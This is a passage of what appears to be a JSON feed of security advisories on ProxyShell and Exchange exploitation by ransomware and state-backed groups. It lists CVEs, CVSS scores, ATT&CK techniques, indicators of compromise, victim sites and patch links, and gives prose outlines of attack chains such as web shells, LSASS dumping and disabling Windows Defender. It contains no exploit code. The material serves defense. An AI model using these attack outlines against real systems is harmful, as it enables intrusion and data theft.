against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-15T06:49:00", "type": "thn", "title": "U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-09-16T03:17:57", "id": "THN:802C6445DD27FFC7978D22CC3182AD58", "href": "https://thehackernews.com/2022/09/us-charges-3-iranian-hackers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": 
"2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nMicrosoft Exchange Server vulnerabilities have been officially patched for five months now. These vulnerabilities are being actively exploited by multiple threat actors collectively tracked as DeadRinger. DeadRinger has been affecting the telecommunications industry all around the world. DeadRinger consists of three clusters. The first one includes the threat group Softcell, which has been active since 2012. The Naikon group, which has been active since 2020, is the second cluster. We discovered that the signatures match those of TG-3390, making it the third cluster.\n\nIn response, Hive Pro Threat Researchers advise that you address these vulnerabilities.\n\nThe techniques used by DeadRinger include: \nT1592: Gather Victim Host Information \nT1595: Active Scanning \nT1590: Gather Victim Network Information \nT1190: Exploit Public-Facing Application \nT1059: Command and Scripting Interpreter \nT1047: Windows Management Instrumentation \nT1059.001: Command and Scripting Interpreter: PowerShell \nT1505.003: Server Software Component: Web Shell \nT1136: Create Account \nT1053: Scheduled Task/Job \nT1078: Valid Accounts \nT1574: Hijack Execution Flow \nT1027.005: Obfuscated Files or Information: Indicator Removal from Tools \nT1027: Obfuscated Files or Information \nT1036: Masquerading \nT1070.006: Indicator Removal on Host: Timestomp \nT1140: Deobfuscate/Decode Files or Information \nT1040: Network Sniffing \nT1087: Account Discovery \nT1018: Remote System Discovery \nT1071.001: Application Layer Protocol: Web Protocols \nT1041: Exfiltration Over C2 Channel \nT1021.002: Remote Services: SMB/Windows Admin Shares \nT1550.002: Use Alternate Authentication Material: Pass the Hash \nT1105: Ingress Tool Transfer \nT1555: Credentials from Password Stores \nT1003: OS Credential Dumping \nT1016: System Network 
Configuration Discovery \nT1069: Permission Groups Discovery \nT1560: Archive Collected Data \nT1569: System Services \nT1543.003: Create or Modify System Process: Windows Service \nT1574.002: Hijack Execution Flow: DLL Side-Loading \nT1570: Lateral Tool Transfer \nT1056.001: Input Capture: Keylogging \nT1573: Encrypted Channel\n\n#### Vulnerability Details\n\n#### Actor Details\n\n#### Indicators of Compromise (IoCs)\n\n#### Patch 
Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065>\n\n#### References\n\n<https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos>\n\n<https://www.zdnet.com/article/deadringer-chinese-apts-strike-major-telecommunications-companies/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T11:01:05", "type": "hivepro", "title": "Have you patched the vulnerabilities in Microsoft Exchange Server?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-08-18T11:01:05", "id": "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "href": "https://www.hivepro.com/have-you-patched-the-vulnerabilities-in-microsoft-exchange-server/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-03-25T05:32:31", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, download the pdf file here.\n\nAPT35, aka Magic Hound, an Iranian-backed threat group, has begun using the Microsoft Exchange ProxyShell vulnerabilities as an initial attack vector and to execute code through multiple web shells. The group has primarily targeted organizations in the energy, government, and technology sectors based in the United States, the United Kingdom, Saudi Arabia, and the United Arab Emirates, among other countries.\n\nThe threat actor exploits the Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access, create web shells, and disable antivirus services on the victim\u2019s system. To gain persistence in the environment, the threat actor employs both account creation and scheduled tasks. For future re-entry, the account is added to the \"remote desktop users\" and \"local administrator's users\" groups. The threat actors use PowerShell to issue multiple commands to disable Windows Defender. They then create a process memory dump from LSASS.exe that is zipped before exfiltration via the web shell. The threat actor uses native Windows programs like \"net\" and \"ipconfig\" to enumerate the compromised server. A file masquerading as dllhost.exe is used to access certain domains for command and control. Data can therefore be exfiltrated by the threat actor, which could potentially result in information theft and espionage.\n\nThe Microsoft Exchange ProxyShell vulnerabilities have been fixed in the latest updates from Microsoft. Organizations can patch these vulnerabilities using the patch links given below.\n\nThe MITRE TTPs commonly used by APT35 are: \nTA0001: Initial Access \nTA0002: Execution \nTA0003: Persistence \nTA0004: Privilege Escalation \nTA0005: Defense Evasion \nTA0006: Credential Access \nTA0007: Discovery \nTA0011: Command and Control \nT1190: Exploit Public-Facing Application \nT1003: OS Credential Dumping \nT1098: Account Manipulation \nT1078: Valid Accounts \nT1105: Ingress Tool Transfer \nT1036: Masquerading \nT1036.005: Masquerading: Match Legitimate Name or Location \nT1543: Create or Modify System Process \nT1543.003: Create or Modify System Process: Windows Service \nT1505: Server Software Component \nT1505.003: Server Software Component: Web Shell \nT1082: System Information Discovery \nT1016: System Network Configuration Discovery \nT1033: System Owner/User Discovery \nT1059: Command and Scripting Interpreter \nT1059.003: Command and Scripting Interpreter: Windows Command Shell\n\n#### Actor Details\n\n#### Vulnerability Details\n\n#### Indicators of Compromise (IoCs)\n\n#### Patches\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>\n\n#### References\n\n<https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T04:05:09", "type": "hivepro", "title": "Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-25T04:05:09", "id": "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "href": "https://www.hivepro.com/magic-hound-exploiting-old-microsoft-exchange-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:20:43", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/BlackByte-ransomware-exploits-Microsoft-Servers-ProxyShell-vulnerabilities_TA202155.pdf>)\n\nBlackByte ransomware is targeting organizations with unpatched ProxyShell vulnerabilities. ProxyShell was addressed by Hive Pro threat researchers in a previous [advisory](<https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/>) released on August 24.\n\nProxyShell is a combination of three flaws in Microsoft Exchange:\n\nCVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control. \nCVE-2021-34523 Privilege escalation vulnerability in the Exchange PowerShell backend. \nCVE-2021-31207 Post-auth remote code execution via arbitrary file write.\n\nThese security flaws are used together by threat actors to perform unauthenticated remote code execution on vulnerable servers. After exploiting these vulnerabilities, the threat actors install web shells, coin miners, ransomware, or backdoors on the servers. Attackers then use the web shell to deploy a Cobalt Strike Beacon into the Windows Update Agent and obtain the credentials for a service account on the compromised servers. The actor then installs AnyDesk to gain control of the system and move laterally within the organization's network. Post exploitation, attackers use Cobalt Strike to execute the BlackByte ransomware and encrypt the data.\n\nAffected organizations can decrypt their files using a free decryption tool written by [Trustwave](<https://github.com/SpiderLabs/BlackByteDecryptor>). Users can patch their servers for the ProxyShell vulnerabilities using the links below.\n\n**Techniques used by BlackByte ransomware are:**\n\nT1505.003 Server Software Component: Web Shell \nT1055 Process Injection \nT1059.001 Command and Scripting Interpreter: PowerShell \nT1595.002 Active Scanning: Vulnerability Scanning \nT1027 Obfuscated Files or Information \nT1490 Inhibit System Recovery \nT1112 Modify Registry \nT1562.001 Impair Defenses: Disable or Modify Tools \nT1562.004 Impair Defenses: Disable or Modify System Firewall \nT1018 Remote System Discovery \nT1016 System Network Configuration Discovery \nT1070.004 Indicator Removal on Host: File Deletion \nT1560.001 Archive Collected Data: Archive via Utility\n\n#### Vulnerability Details\n\n#### Actor Detail\n\n#### Indicators of Compromise (IoCs)\n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### 
References\n\n<https://redcanary.com/blog/blackbyte-ransomware/>\n\n<https://www.techtarget.com/searchsecurity/news/252510334/BlackByte-ransomware-attacks-exploiting-ProxyShell-flaws>\n\n<https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/>\n\n<https://www.stellarinfo.com/blog/blackbyte-ransomware-attacks-exchange-servers-with-proxyshell-flaws/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T13:24:49", "type": "hivepro", "title": "BlackByte ransomware exploits Microsoft Servers ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-12-07T13:24:49", "id": "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "href": "https://www.hivepro.com/blackbyte-ransomware-exploits-microsoft-servers-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T15:39:16", "description": "THREAT LEVEL: Red. 
For a detailed advisory, download the pdf file here Hive Ransomware has been active since its discovery in June 2021, and it is constantly deploying different backdoors, including the Cobalt Strike beacon, on Microsoft Exchange servers that are vulnerable to the ProxyShell (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) security flaws. The threat actors then conduct network reconnaissance, obtain admin account credentials, and exfiltrate valuable data before deploying the file-encrypting payload. Hive and its affiliates gain access to victims' networks by a variety of methods, including phishing emails with malicious attachments, compromised VPN passwords, and exploitation of weaknesses in external-facing assets. Furthermore, Hive leaves a plain-text ransom note threatening to disclose the victim's data on the Tor site 'HiveLeaks' if the victim does not meet the attacker's terms. Organizations can mitigate the risk by following these recommendations: \u2022 Use multi-factor authentication. \u2022 Keep all operating systems and software up to date. \u2022 Remove unnecessary access to administrative shares. \u2022 Maintain offline backups of data and ensure all backup data is encrypted and immutable. \u2022 Enable protected files in the Windows operating system for critical files. 
The MITRE ATT&CK TTPs used by Hive Ransomware are: TA0001: Initial Access; TA0002: Execution; TA0003: Persistence; TA0004: Privilege Escalation; TA0005: Defense Evasion; TA0006: Credential Access; TA0007: Discovery; TA0008: Lateral Movement; TA0009: Collection; TA0011: Command and Control; TA0010: Exfiltration; TA0040: Impact; T1190: Exploit Public-Facing Application; T1566: Phishing; T1566.001: Spear-phishing Attachment; T1106: Native API; T1204: User Execution; T1204.002: Malicious File; T1059: Command and Scripting Interpreter; T1059.001: PowerShell; T1059.003: Windows Command Shell; T1053: Scheduled Task/Job; T1053.005: Scheduled Task; T1047: Windows Management Instrumentation; T1136: Create Account; T1136.002: Domain Account; T1078: Valid Accounts; T1078.002: Domain Accounts; T1053: Boot or Logon Autostart Execution; T1068: Exploitation for Privilege Escalation; T1140: Deobfuscate/Decode Files or Information; T1070: Indicator Removal on Host; T1070.001: Clear Windows Event Logs; T1562: Impair Defenses; T1562.001: Disable or Modify Tools; T1003: OS Credential Dumping; T1003.005: Cached Domain Credentials; T1018: Remote System Discovery; T1021: Remote Services; T1021.001: Remote Desktop Protocol; T1021.002: SMB/Windows Admin Shares; T1021.006: Windows Remote Management; T1083: File and Directory Discovery; T1057: Process Discovery; T1063: Security Software Discovery; T1049: System Network Connections Discovery; T1135: Network Share Discovery; T1071: Application Layer Protocol; T1071.001: Web Protocols; T1570: Lateral Tool Transfer; T1486: Data Encrypted for Impact; T1005: Data from Local System; T1560: Archive Collected Data; T1560.001: Archive via Utility; T1105: Ingress Tool Transfer; T1567: Exfiltration Over Web Service. Actor Details Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches https://millsgrouponline.com/ https://www.fcch.com/ https://www.konradin.de/de/ https://www.pollmann.at/en https://www.emilfrey.ch/de https://rte.com.br/ https://www.friedrich.com/ https://powerhouse1.com/ https://www.hshi.co.kr/eng/ 
https://www.eurocoininteractive.nl/ https://www.itsinfocom.com/ https://www.pan-energy.com/ https://nsminc.com/ https://www.ucsiuniversity.edu.my/ https://kemlu.go.id/portal/id Patch Links https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 References https://www.varonis.com/blog/hive-ransomware-analysis https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T14:34:47", "type": "hivepro", "title": "Hive Ransomware targets organizations with ProxyShell exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-22T14:34:47", "id": "HIVEPRO:F2305684A25C735549865536AA4254BF", "href": "https://www.hivepro.com/hive-ransomware-targets-organizations-with-proxyshell-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-03-24T14:24:49", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released threat advisories on AvosLocker ransomware. It is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations in critical infrastructure sectors such as financial services, manufacturing plants, and government facilities in countries such as the United States, Saudi Arabia, the United Kingdom, Germany, Spain, and the United Arab Emirates, among others. After its affiliates infect targets, AvosLocker claims to handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data. The AvosLocker ransomware is a multi-threaded C++ Windows executable that operates as a console application and displays a log of actions performed on victim computers. For the delivery of the ransomware payload, the attackers use spam email campaigns as the initial infection vector. The threat actors exploit the ProxyShell vulnerabilities CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, as well as CVE-2021-26855, to gain access to the victim\u2019s machine and then deploy Mimikatz to steal passwords. Furthermore, the threat actors can use the stolen credentials to get RDP access to the domain controller and then exfiltrate data from the compromised machine. Finally, the attacker installs AvosLocker ransomware on the victim's computer and encrypts the victim's documents and files with the \".avos\" extension. The actor then leaves a ransom note named \"GET YOUR FILES BACK.txt\" in each directory with a link to an AvosLocker .onion payment site. Organizations can mitigate the risk by following these recommendations: \u2022 Keep all operating systems and software up to date. \u2022 Remove unnecessary access to administrative shares. 
\u2022 Maintain offline backups of data and ensure all backup data is encrypted and immutable. The MITRE TTPs commonly used by AvosLocker are: TA0001: Initial Access; TA0002: Execution; TA0007: Discovery; TA0040: Impact; T1566: Phishing; T1204: User Execution; T1082: System Information Discovery; T1490: Inhibit System Recovery; T1489: Service Stop; T1486: Data Encrypted for Impact. Actor Detail Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 Recent Breaches https://www.unical.com/ https://www.paccity.net/ https://www.gigabyte.com/ Reference https://www.cisa.gov/uscert/ncas/current-activity/2022/03/22/fbi-and-fincen-release-advisory-avoslocker-ransomware", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-24T06:30:44", "type": "hivepro", "title": "AvosLocker Ransomware group has targeted 50+ Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-24T06:30:44", "id": "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "href": "https://www.hivepro.com/avoslocker-ransomware-group-has-targeted-50-organizations-worldwide/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-24T12:00:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202131.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nLockFile, a new ransomware gang, has been active since last week. LockFile began by using a publicly disclosed PetitPotam exploit (CVE-2021-36942) to compromise Windows Domain Controllers earlier this week. Using the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), they have now infiltrated many Microsoft Exchange Servers. The origins of this gang are most likely China. The gang used a ransomware note similar to that of LokiBot and has been linked to Conti ransomware because of the contact email address provided (contact@contipauper[.]com). 
HivePro Threat Research team advises everyone to patch the vulnerabilities to prevent an attack.\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n**Name** | **Target Locations** | **Target Sectors** | \n---|---|---|--- \nLockFile Ransomware | United States of America and Asia | Manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors | \n \n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 209.14.0.234 \nSHA-2 Hash | ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 \ncafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 \n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 \n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f \n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 \n2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a \n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd \nc020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 \na926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 \n368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 \nd030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a \na0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 \n \n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n#### References\n\n<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>\n\n<https://www.bleepingcomputer.com/news/security/lockfile-ransomware-uses-petitpotam-attack-to-hijack-windows-domains/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T10:35:48", "type": "hivepro", "title": "ProxyShell and PetitPotam exploits weaponized by LockFile Ransomware Group", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-24T10:35:48", "id": "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "href": "https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T15:34:57", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities: 430; Interesting Vulnerabilities: 5; Active Threat Groups: 2; Targeted Countries: Worldwide; Targeted Industries: 17; ATT&CK TTPs: 46. The fourth week of April 2022 witnessed the discovery of 430 vulnerabilities, of which 5 gained the attention of threat actors and security researchers worldwide. Among these 5, there was 1 zero-day and 1 vulnerability that was awaiting analysis on the National Vulnerability Database (NVD). 
Hive Pro Threat Research Team has curated a list of 5 CVEs that require immediate action. Further, we observed two threat actor groups being highly active in the last week. Lazarus, a North Korean threat actor group known for financial crime, was observed targeting the blockchain technology and cryptocurrency industry using new malware named TraderTraitor, and the Hive ransomware group was seen using the ProxyShell vulnerabilities to target organizations around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34473 CVE-2021-34523 CVE-2021-31207 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 CVE-2022-0540 https://www.atlassian.com/software/jira/core/download https://www.atlassian.com/software/jira/update CVE-2022-29072* Not Available Active Actors: Icon Name Origin Motive Lazarus Group (APT38, BlueNoroff, and Stardust Chollima) North Korea Financial crime and gain Hive Ransomware Group Unknown Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1588: Obtain Capabilities T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1136: Create Account T1134: Access Token Manipulation T1134: Access Token Manipulation T1110: Brute Force T1083: File and Directory Discovery T1570: Lateral Tool Transfer T1560: Archive Collected Data T1071: Application Layer Protocol T1567: Exfiltration Over Web 
